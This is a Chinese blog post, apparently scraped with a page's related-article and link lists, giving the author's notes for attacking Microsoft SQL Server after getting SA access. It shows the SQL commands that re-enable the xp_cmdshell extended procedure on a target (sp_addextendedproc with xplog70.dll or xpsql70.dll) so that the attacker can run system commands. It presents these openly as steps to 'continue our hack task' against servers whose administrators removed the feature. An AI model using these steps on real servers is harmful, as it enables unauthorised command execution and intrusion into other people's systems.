最近需要用到这些东西的时候，发现自己有点记不清了，这真是人老了做什么都不行了。没办法，只好在自己的blog上总结一下吧。使用Sqlexec加管理员的过程这里冰血就不涉及了。
前提需要工具：SQL Query Analyzer和SqlExec Sunx Version
第一部分：
有关去掉xp_cmdshell来保护系统的分析总结：
首先知道一下语句：
1.去掉xp_cmdshell扩展过程的方法是使用如下语句：
if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)<br>exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

2.添加xp_cmdshell扩展过程的方法是使用如下语句：
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

现在看看现象：
我们在取得SA权限后远程用Sqlexec执行cmd命令，出现提示SQL_ERROR，那么很可能是去掉了xp_cmdshell。

现在来看看被去掉xp_cmdshell后恢复的两种方法：
方法一、使用SQL Query Analyzer连接对方后直接写入，挺方便
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

方法二、使用SqlExec Sunx Version
首先在SqlExec Sunx Version的Format选项里填上%s，在CMD选项里输入
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

或者对Sql2000情况下使用
sp_addextendedproc 'xp_cmdshell','xplog70.dll'

另外使用SqlExec Sunx Version来去除xp_cmdshell的方法
和加的时候选择条件一样，然后输入
sp_dropextendedproc 'xp_cmdshell'

就可以了

第二部分：
假如对方已经把xplog70.dll删除或者改了名，我们来用下面的方法继续我们的hack任务：
当出现如下现象暗示代表很有可能是xplog70.dll删除或者改了名。
在查询分析器中写入
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

提示
数据库中已存在名为'xp_cmdshell'的对象

那么我们如何恢复呢？
其实按照高手lcx提供的方法，我们可以通过使用查询分析器中写脚本来实现。

SQL Server SA权限总结相关推荐

1. SQL Server SA权限总结(还是在冰血blog偷的)

   最近需要用到这些东西的时候,发现自己有点记不清了,这真是人老了做什么都不行了.没办法,只好在自己的blog上总结一下吧.使用Sqlexec加管理员的过程这里冰血就不涉及了. 前提需要工具:SQL Qu ...

2. Microsoft SQL Server SA权限最新入侵方法

   在获得SA密码后,往往因为服务器管理者或"前人"将net.exe和net1.exe被限制使用,无法添加管理员账号.我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来 ...

3. 恢复 Microsoft SQL Server SA 密码的三种方法

   如果您丢失了 SA 密码,您可能认为唯一的选择是重新安装 SQL Server 并重新附加所有用户数据库.只需在单用户模式下启动 SQL Server,您就可以使用 OSQL 命令轻松恢复 SA 密码 ...

4. SQLServer · 最佳实践 · RDS for SQL Server 2012 权限限制的提升与改善

   title: SQLServer · 最佳实践 · RDS for SQL Server 2012 权限限制的提升与改善 author: 石沫 背景 SQL Server 作为一种强大的关系型数据库, ...

5. SQL Server:OA权限管理设计的实现 下

   SQL Server:OA权限管理设计的实现 下 OA系统权限管理设计方案      不同职责的人员,对于系统操作的权限应该是不同的.优秀的业务系统,这是最基本的功能.      可以对"组 ...

6. SQL SERVER 2008权限配置

   我要的结果是这样:只能有查询表的权限,而且还要有运行SQL Server Profiler的权限.这样才能跟踪发现问题,当然解决问题是另外一回事,即不能有修改和更新存储过程的权限. 我在分配角色成员时 ...

7. sql server alter权限_SQL

   Transact-SQL语言的5种类型 ·数据定义语言 ·数据操纵语言 ·数据控制语言 ·事务管理语言 ·附加的语言元素 数据定义语言 ·数据定义语言(DDL)是指用来定义和管理数据库以及数据库中各种 ...

8. 【解决SQL Server sa连接服务器失败】用户‘sa‘登录失败。已成功与服务器建立连接，但是在登录过程中发生错误

   这个问题网上也有写-但是有点杂乱,因为年代久远,很多经验贴格式也很杂乱,图也裂了() 所以我稍微整理了一下网上的步骤,并加以自己的补充 (1)第一次连接服务器,先填写服务器名称(右键我的电脑可以查看到 ...

9. Sql Server关于权限、角色以及登录名、用户名的总结

   官方文档https://docs.microsoft.com/zh-cn/sql/t-sql/statements/grant-transact-sql?view=sql-server-2017 权限 ...

最新文章

1. 演示：标准ACL的配置、及使用技巧、和相关局限
2. 批处理清除VisualStudio解决方案文件夹
3. hbase源码系列（一）Balancer 负载均衡
4. linux FTP服务器访问权限的问题
5. 如何在vmware虚拟机下挂载windows硬盘
6. 类的特殊成员反射异常处理
7. 【渝粤题库】国家开放大学2021春1398分析化学（本）题目
8. JavaSE----常用类（String、StringBuilder、StringBuffer）
9. 软件测试学习指南（更新中）
10. python print 3位小数_python 这样 print 才够骚啊 （3）
11. [BZOJ4913][SDOI2017]遗忘的集合
12. （转）马云：不要迷信成功学 要多看别人的失败经历
13. 做对了什么与留下了什么 小米上市的背后
14. 年会弹幕文字_公司办年会有哪些比较创意的形式？
15. 欲为苍鹰，勿与鸟鸣， 欲为强者，莫与弱争！
16. excel怎么自动填充连续数字
17. （附源码）ssm 座位管理系统 毕业设计 250858
18. 如何计算每个月有多少天
19. Qt播放HTML网页视频
20. HTML5期末大作业：商城网站设计——仿天猫在线商城（HTML和CSS实现天猫在线商城网站）

热门文章

1. ERNIE，ERNIE2.0，Transformer-XL，XLNET
2. 如何把通达信公式变成python_通达信公式-主力雷达Python化
3. matlab下载保姆级安装教程，哪个版本比较好些？
4. 计算机在剪辑方面的应用,简论计算机多媒体技术在影视后期制作中的应用
5. 偶数乘2奇数乘3C语言,输入一个整数x,如果为偶数乘2,否则乘3,然后输出.C语言
6. python matplotlib axes3d.get_test_data() 是什么意思?(获得测试数据)
7. Cron 表达式详解和案例
8. NLP进阶，Bert+BiLSTM情感分析实战
9. java全栈系列之JavaSE-面向对象（方法重写）037
10. linux 交换机tftp服务,简单文件传输TFTP服务器搭建 Linux RHEL6